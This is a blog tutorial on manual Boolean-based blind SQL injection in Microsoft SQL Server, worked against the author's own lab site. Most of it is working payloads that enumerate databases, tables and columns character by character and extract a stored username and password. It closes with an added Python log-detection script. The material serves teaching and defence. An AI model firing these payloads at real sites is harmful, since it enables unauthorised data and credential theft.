Notes on manual Boolean-based blind injection in Microsoft SQL Server

saulGoodman

Red Team, a public account focused on offensive and defensive research

First, determine whether an injection point exists:

'
and 1=1
and 1=2

Guess database name

First, guess whether a given dbid exists:

http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1

The statement above checks whether a database with dbid=5 exists; the trailing =1 is the existence test. If the database exists, the page returns normally.

Because I created two databases: test (dbid 5) and saulgoodman (dbid 6)

So we can check that dbid=6 exists in the same way:

http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=6)=1

Querying dbid=7 returns an error, because no database with that dbid exists.

Guess the database name from its dbid: first guess the length

http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1

Because the name of the database with dbid 5 is test, its length is 4. The condition dbid=5 and len(name)=4 asks whether the name of the database with dbid=5 has length 4; if the page returns normally, the length is 4.

http://192.168.159.135:8080/get.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1

The name of the database with dbid 6 is saulgoodman, whose length is 11. The condition dbid=6 and len(name)=11 asks whether the name of the database with dbid=6 has length 11; if the page returns normally, the length is 11. Query the name lengths of any further databases in the same way.

Query the database name character by character using the dbid

PS: substring(str,start,len) extracts part of a string: the first parameter is the string, the second is the position to start from, and the third is the number of characters to take.

ascii(char) converts a character to its ASCII value.

Because the name of the database with dbid 5 is test, and the ASCII code of its first character t is 116, we can use the following statement to check it:

and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116

Then the remaining characters:

Second character: e
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101
Third character: s
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115
Fourth character: t
and ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),4,1)) = 116

So the database name we have recovered is: test!

To guess the name of the second database, change dbid to 6 and repeat the steps above.

Guess the table name

Since we know the database name test, we can use the following statement to ask whether the length of a table name is 5 (the table name is users):

and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1

As the figure shows, the page returns normally, so the length is 5; now we can guess the characters one by one: users

Guess the first character: u
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1
Guess the second character: s
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1
Guess the third character: e
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1
Guess the fourth character: r
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1
Guess the fifth character: s
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1

Since we know that the first table name in database test is users, we can use the following statements to query the characters of the second table name (table name info):

Guess the first character: i
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1
Guess the second character: n
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1
Guess the third character: f
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1
Guess the fourth character: o
and (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1

Guess the column name

Since we know the table name users, we can now guess its column names (the column name here is username):

Guess the first character of the column name: u
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)
Guess the second character of the column name: s
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)
Guess the third character of the column name: e
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)
Guess the fourth character of the column name: r
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)
Guess the fifth character of the column name: n
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)
Guess the sixth character of the column name: a
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)
Guess the seventh character of the column name: m
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)
Guess the eighth character of the column name: e
and exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)

This recovers the column name: username!

The second method: the table has four columns, id, username, password and age

Get the first column name (id)

Get the first character: i
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105
Get the second character: d
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100

Get the second column name (username)

Get the first character: u
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117
Get the second character: s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115
Get the third character: e
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101
Get the fourth character: r
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114
Get the fifth character: n
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110
Get the sixth character: a
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97
Get the seventh character: m
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109
Get the eighth character: e
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101

Get the third column name (password)

Get the first character: p
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112
Get the second character: a
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97
Get the third character: s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115
Get the fourth character: s
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115
Get the fifth character: w
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119
Get the sixth character: o
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111
Get the seventh character: r
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114
Get the eighth character: d
and ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100

To get the next column, keep appending another condition of the form and name not in ('列名'), where 列名 is a column name already recovered.

Retrieve data

and ascii(substring((select top 1 列名 from 表名),N,1)) >= 65

(Here 列名 is the column name, 表名 is the table name, and N is the position of the character being tested.)

We know the table name is users and the column names are username and password, so we can start extracting data (the username is saul):

Check the first character of the username column: s
and ascii(substring((select top 1 username from users),1,1)) = 115
Check the second character of the username column: a
and ascii(substring((select top 1 username from users),2,1)) = 97
Check the third character of the username column: u
and ascii(substring((select top 1 username from users),3,1)) = 117
Check the fourth character of the username column: l
and ascii(substring((select top 1 username from users),4,1)) =108

This gives the first username: saul

Get saul's password (the password is saul520)

Check the first character of the password column: s
and ascii(substring((select top 1 password from users),1,1)) =115
Check the second character of the password column: a
and ascii(substring((select top 1 password from users),2,1)) =97
Check the third character of the password column: u
and ascii(substring((select top 1 password from users),3,1)) =117
Check the fourth character of the password column: l
and ascii(substring((select top 1 password from users),4,1)) =108
Check the fifth character of the password column: 5
and ascii(substring((select top 1 password from users),5,1)) =53
Check the sixth character of the password column: 2
and ascii(substring((select top 1 password from users),6,1)) =50
Check the seventh character of the password column: 0
and ascii(substring((select top 1 password from users),7,1)) =48
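Every step above leaves a distinctive trace in the web server's access log: the and 1=1 / and 1=2 pair, references to sysdatabases, sysobjects and syscolumns, and long runs of ascii(substring(...)) probes against the same parameter. The following is an added example (not part of the original post) that decodes a few constructed access-log lines in a simplified "client method path" format and tallies these probe categories per client, so a defender can spot the enumeration while it is still in progress.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log (client, method, request path); the first client replays
# the probing sequence from the notes above, the second is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.7 GET /get.aspx?id=1
10.0.0.7 GET /get.aspx?id=1%20and%201=1
10.0.0.7 GET /get.aspx?id=1%20and%201=2
10.0.0.7 GET /get.aspx?id=1%20and%20(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20dbid=5)=1
10.0.0.7 GET /get.aspx?id=1%20and%20ascii(substring((select%20top%201%20name%20from%20master.dbo.sysdatabases%20where%20dbid=5),1,1))%20=%20116
10.0.0.9 GET /get.aspx?id=2
10.0.0.9 GET /get.aspx?id=3
"""

# Each pattern captures one of the probe styles used in the walkthrough.
PROBE_PATTERNS = {
    "tautology": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),         # and 1=1 / and 1=2
    "catalog_enum": re.compile(r"\b(sysdatabases|sysobjects|syscolumns)\b", re.I),
    "char_oracle": re.compile(r"\b(ascii|unicode)\s*\(\s*substring\s*\(", re.I),
    "len_probe": re.compile(r"\blen\s*\(\s*name\s*\)\s*=", re.I),    # len(name)=N
}

def classify_request(raw_path):
    """URL-decode a request path and return the set of probe categories it matches."""
    decoded = unquote_plus(raw_path)
    return {tag for tag, rx in PROBE_PATTERNS.items() if rx.search(decoded)}

def analyse_log(text, threshold=3):
    """Count probe categories per client; return clients whose total reaches threshold."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue                      # skip malformed lines
        client, path = parts[0], parts[2]
        for tag in classify_request(path):
            hits[client][tag] += 1
    return {c: dict(tags) for c, tags in hits.items() if sum(tags.values()) >= threshold}

if __name__ == "__main__":
    for client, tags in analyse_log(SAMPLE_LOG).items():
        print(client, tags)
```

The threshold keeps a single stray 1=1 from paging anyone; the real signal is the volume of character-oracle requests against one parameter. Detection only surfaces the probing; the root cause in get.aspx is removed by passing id as a query parameter rather than concatenating it into the SQL string.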

That concludes these notes on manual Boolean-based blind injection in MSSQL.


Origin blog.csdn.net/weixin_46245322/article/details/105213368